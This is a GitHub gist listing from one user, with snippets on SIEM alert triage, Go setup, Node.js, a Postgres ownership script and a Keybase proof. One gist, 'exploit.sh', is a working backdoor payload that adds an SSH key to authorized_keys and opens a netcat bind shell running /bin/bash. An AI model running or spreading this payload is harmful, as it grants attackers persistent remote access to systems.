@jandre
jandre / gist:38db0124e9c6c9761a34
Last active March 28, 2016 18:31
Alert triage questions

Some sample questions a security team may ask when triaging events that come from a SIEM/Log Management or directly via a H(N)IDS.

Generally, the exact information an analyst needs to triage an alert varies depending on the type of event and its source.

Alert triage usually happens in the 'event handling' process -> before a 'security incident' is declared and more detailed investigation is needed. However, in smaller SOCs with less rigour, the process is often compressed - e.g., the same person who is triaging -> performs the more detailed investigation, forensics, and other processes that are needed to proceed with incident response. Answering some of the questions below may fall into these later phases rather than being pure 'triage' tasks.

Domain/Hostname information

  • What hostname(s) corresponds to the IP addresses (reverse IP lookup)? (e.g., 123.44.5.55 == google.com, or badmailserver.ru?) Do the hostnames appear to be suspicious, or valid business activity?

Keybase proof

I hereby claim:

  • I am jandre on github.
  • I am jandre (https://keybase.io/jandre) on keybase.
  • I have a public key whose fingerprint is 6DA2 9D93 9AAA CD1E 8939 CBFD 5004 12C5 9B54 59C9

To claim this, I am signing this object:

build a go lib and binary
1. installing go
   1. OS X: brew install go
   2. Linux: https://github.com/dcoxall/vagrant-golang ?
3. organizing your code
   1. GOPATH export GOPATH=/Users/jandre/godemo
   2. WORKSPACE https://golang.org/doc/code.html
@jandre
jandre / running
Last active August 29, 2015 14:06
exploit.sh
#!/bin/bash
touch /tmp/exploited
cd ~
mkdir -p .ssh
chmod 755 .ssh
touch .ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC690OnLNFvUsbWvtpXkyyHnCaC6TNpa5bjODqRFjEaXd2s3VuvZOMCPGuyrHNA891IjisdVIqoOhL7asLnMcTP4cPxbP6JBaKkeNk3M72YBr6+lxQQPUyhDazTezK90JadkZkWwS1oXsrneLFW7rSoQAQGcbze4LIhrC7317+Wcex9ktza9Xvf57WwPkIO1hJcISn6GaaADgpA344/9acipQkZF/HdvmIiNf5nDN/tQTNdh7kSmAWKlr9stVktcBuhs6LaFVwFrsgNp+TXW6BIDfnFnD70EkUmsuA7ZFTMP65qKgGUrZYp4nqvqWtFVubsdjKOBOEGTad6uef+iw+F jandre@gmail.com" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
nc -s 0.0.0.0 -l -p 4444 -e /bin/bash &
@jandre
jandre / really.md
Last active August 29, 2015 14:01
really node???
//
// async method passing errors via
// the standard convention of callback(err)
//
> dns.reverse('4.4.4.4', console.log)
{ oncomplete: [Function: onanswer] }
> { [Error: getHostByAddr ENOTFOUND]
  code: 'ENOTFOUND',
@jandre
jandre / forktest.js
Last active August 16, 2016 17:34
fork example
var fork = require('child_process').fork;
var spawn = require('child_process').spawn;
var fs = require('fs');
var path = require('path');
function forkProcess() {
var fd = fs.openSync('/tmp/sensitive_file', 'w');
var opts = {
};
fork(process.argv[1], ["--forked"], opts)
@jandre
jandre / onedayofgo.md
Last active January 1, 2016 23:19
One Day Of Go

One day of Go

One of my ongoing resolutions is to learn a new programming language every year. I've been looking at Go for a while and I thought it would be fun to use the 'holiday' today to really get cranking. I recorded some random impressions as I was chugging along...

When learning a language, I'm one of those people that can't simply read documentation and contrived code examples with any usable level of recall -- I need to internalize it by writing code to solve a legitimate problem. So, I decided to write a little library, a parser for the Linux /proc filesystem. There aren't very many good ones that I've found for Go (and I am thinking of some projects I may want to use it for in the future).

Steps taken:

  1. Read a bit of code
#!/usr/bin/env sh
if ! which md5sum > /dev/null; then
echo Install md5sum
exit 1
fi
if ! which curl > /dev/null; then
echo Install curl
exit 1
@jandre
jandre / pg_change_owner.sh
Created August 10, 2012 19:46
pg change owner
#!/bin/bash
usage()
{
cat << EOF
usage: $0 options
This script sets ownership for all tables, sequences and views for a given database
Credit: Based on http://stackoverflow.com/a/2686185/305019 by Alex Soto